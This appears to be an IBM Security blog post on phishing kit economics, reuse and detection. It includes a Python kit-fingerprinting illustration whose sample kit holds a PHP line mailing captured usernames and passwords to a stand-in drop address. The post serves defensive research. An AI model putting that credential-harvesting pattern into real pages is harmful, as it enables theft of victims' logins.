Why is one of cybercrime’s oldest threats still so strong? The Anti-Phishing Working Group (APWG) reports that January 2021 marked an all-time high in APWG archives, with more than 245,771 phishing attacks in a month.
The IBM X-Force Threat Intelligence Index 2021 found that phishing was responsible for 33% of the cyber attacks organizations faced. Phishing, an online threat that emerged in the mid-1990s, remains a prominent cybercrime practice today: it impacts brands and businesses and is a prolific initial driver of compromise in attacks, including those carried out by nation states.
What makes phishing so prevalent? Why is it still successful? Cybercriminals have developed their abilities over time. Many attacks are more sophisticated, harder to detect and, most importantly, easier for criminals to create and deploy at large scale. Phishing attacks can lead to losses of up to $17,700 per minute and are among the main threats. An annual FBI report calculated losses of over $4 billion in 2020 due to internet crime, with phishing attacks leading the way. Clearly, phishing is an endemic threat that continues to plague consumers, businesses and nations, and requires continued education and mitigation efforts.
IBM’s deep dive into phishing attacks
To better understand phishing, IBM Security is conducting ongoing research into the phishing kits and phishing sites that fuel this area of cybercrime. By examining phishing kits at the code level, IBM researchers analyzed more than 40,000 phishing kits and broke them down into their basic components. We analyze things like exfiltration methodologies, uncover compromised data and monitor live phishing campaigns. Think of this research as setting up a sandbox for phishing.
Micro-analyzing the items in each kit gives us detailed insight and the ability to detect new phishing sites with zero false positives. We can also infer the proliferation of kits and campaigns and collect data to see the current activity of a given phishing site.
The goal of IBM’s research is zero-day detection of phishing sites that directly results in blocking access to those pages in real time. It can also mean blocking data exfiltration for users who have already been hacked.
This article on our research is the first in a series of blogs that describe our findings and their importance to the anti-fraud, cybercrime and threat intelligence communities.
Large Scale Phishing – Quick and Dirty Scam
It’s easier and cheaper than ever for phishers to step up their attacks. Phishing itself does not warrant much more investment: it is a very short-lived form of online threat, typically lasting an average of 21 hours from initiation to removal.
According to previously published research, it takes an average of nine hours after a victim first visits a malicious domain for the first detection to occur, and a further seven hours after that for the browser block to take effect and detection of that site to peak. What about the remaining five hours in this lifecycle? They can be attributed to the time it takes for victims to receive the link and start browsing the site.
Kit code and hosting – Use and reuse
Since the lifespan of a phishing site is quite limited, it is not economically viable for most ordinary attackers to invest in its inner workings or infrastructure. So they mostly reuse the same existing kits, with the same code and methods, to launch the same types of attacks over and over again. This is also what makes their attacks much easier to detect.
The majority of the phishing sites we see in our daily analysis come from phishing kits available for purchase on the dark web and reused by many different actors. Typical kits are professionally written and can contain thousands of lines of code. They can be configured per campaign and may even include proper error reporting. These kits range in price from a few hundred to a few thousand dollars and can be deployed in minutes.
Conversely, malware attacks change all the time, shifting tactics in every aspect, especially the underlying code.
In most of the attacks we see, phishers register cheap domains for malicious use, host attacks on a compromised domain, or use a combination of both. Some domain registrations are cheap enough to fund easily, and this route does not require operating or compromising an existing site. The downside is that a standalone malicious site is easier to detect and block than an attack hosted on an established legitimate site. Dark web providers who play the phishing game sell access to compromised servers, but this option increases the overall cost of the attack.
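The reuse described above is what makes kit-based detection practical: if the code does not change between campaigns, a fingerprint that ignores the per-campaign strings identifies every redeployment, while a genuinely different page never matches. The following Python is an added illustration, not IBM’s method or code; the kit files are constructed stand-ins for real kit code, and `normalize`, `kit_id` and `match_score` are hypothetical names.

```python
import hashlib
import re
# Constructed stand-ins for phishing-kit files (path -> source); not real kit
# code, only a model of "same code, new strings" reuse.
KNOWN_KIT = {
    "index.php": '<?php $brand = "ExampleBank"; include("login.html"); ?>',
    "login.html": '<form method="post" action="post.php">'
                  '<input name="user"><input name="pass"></form>',
    "post.php": '<?php $to = "drop@example.test"; '
                'mail($to, "Result", $_POST["user"] . " " . $_POST["pass"]); '
                'header("Location: https://bank.example/"); ?>',
}
# Same kit redeployed by another actor: new brand, new drop address, new
# formatting, but identical code paths.
REDEPLOYED_KIT = {
    "index.php": '<?php\n$brand="OtherBank";\ninclude("login.html");\n?>',
    "login.html": '<form method="post" action="post.php">\n'
                  '  <input name="user">\n  <input name="pass">\n</form>',
    "post.php": '<?php $to="other@example.test";\n'
                'mail($to,"Login",$_POST["user"]." ".$_POST["pass"]);\n'
                'header("Location: https://otherbank.example/"); ?>',
}
LEGIT_SITE = {  # an unrelated legitimate site that must not match
    "index.php": '<?php echo "Welcome"; require("menu.php"); ?>',
    "menu.php": '<nav><a href="/about">About</a></nav>',
}
_STRING = re.compile(r'"[^"]*"|\'[^\']*\'')
_SPACE = re.compile(r"\s+")

def normalize(src: str) -> str:
    """Blank string literals and drop whitespace: per-campaign customisation
    (brand, drop address, layout) no longer changes the hash; code edits do."""
    return _SPACE.sub("", _STRING.sub('""', src))

def file_fingerprints(files: dict) -> dict:
    """Path -> SHA-256 of the normalized source."""
    return {p: hashlib.sha256(normalize(s).encode()).hexdigest()
            for p, s in files.items()}

def kit_id(files: dict) -> str:
    """One stable identifier for a whole kit: hash of its sorted path/hash pairs."""
    parts = sorted(f"{p}:{h}" for p, h in file_fingerprints(files).items())
    return hashlib.sha256("\n".join(parts).encode()).hexdigest()[:16]

def match_score(candidate: dict, known: dict) -> float:
    """Fraction of the known kit's files present unchanged in the candidate;
    1.0 means the kit was reused as-is, 0.0 means no shared code."""
    known_fp, cand_fp = file_fingerprints(known), file_fingerprints(candidate)
    return sum(cand_fp.get(p) == h for p, h in known_fp.items()) / len(known_fp)
```

A partial score (some files unchanged, others edited) flags a modified variant of a known kit rather than a new family, which is the case an analyst wants to triage by hand.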
Target lists from $50 to $500
Once the phishing attack is ready, it must be sent to potential victims. To reach the right audience, phishers can either contract an underground spam service or buy their own target lists. Target lists can be region- or language-specific and can help attackers break into webmail provider inboxes and corporate emails. Depending on the viability and content of the data, mailing lists can range from $50 to $500. The price is offset by reusing the same list for further attacks or reselling it to other criminals.
Spam campaign – the essentials
For a phishing campaign to be effective, it requires some basic features that help the phisher get things done:
- A spam service or an application that can send emails/texts containing the phishing URL
- A service or application that schedules campaigns
- A service or application that can upload target data to the domain
- Code base for a website that mimics legitimate brands – aka a kit
- A way to collect and move the data that the victim provides on the phishing page
- A way to collect statistics on the success of the attack campaign during its life cycle.
Phishing campaigns are so ubiquitous due to the relatively low cost of phishing kits and the ease of deployment. In fact, we can see multiple phishing campaigns deployed by the same individual on the same day.
Can phishers face legal consequences? Sometimes, but more often, phishers use mules and fake identities to front their campaigns, hiding the true identity of the perpetrators.
Coming Soon – Phishing Kit DNA
Phishers may hide in obscurity, but phishing kits can certainly be analyzed and detected. The faster a malicious page is identified, the faster it can be blocked. To this end, IBM Security has developed a way to explore the DNA of the kits and identify phishing pages with certainty, which allows faster blocking. IBM worked with Quad9 to develop a malicious content blocking tool that is available free of charge to anyone who directs their DNS to Quad9. It’s public, and it’s free.
Stay tuned to this blog post for the next post to learn more about how we analyze kit DNA.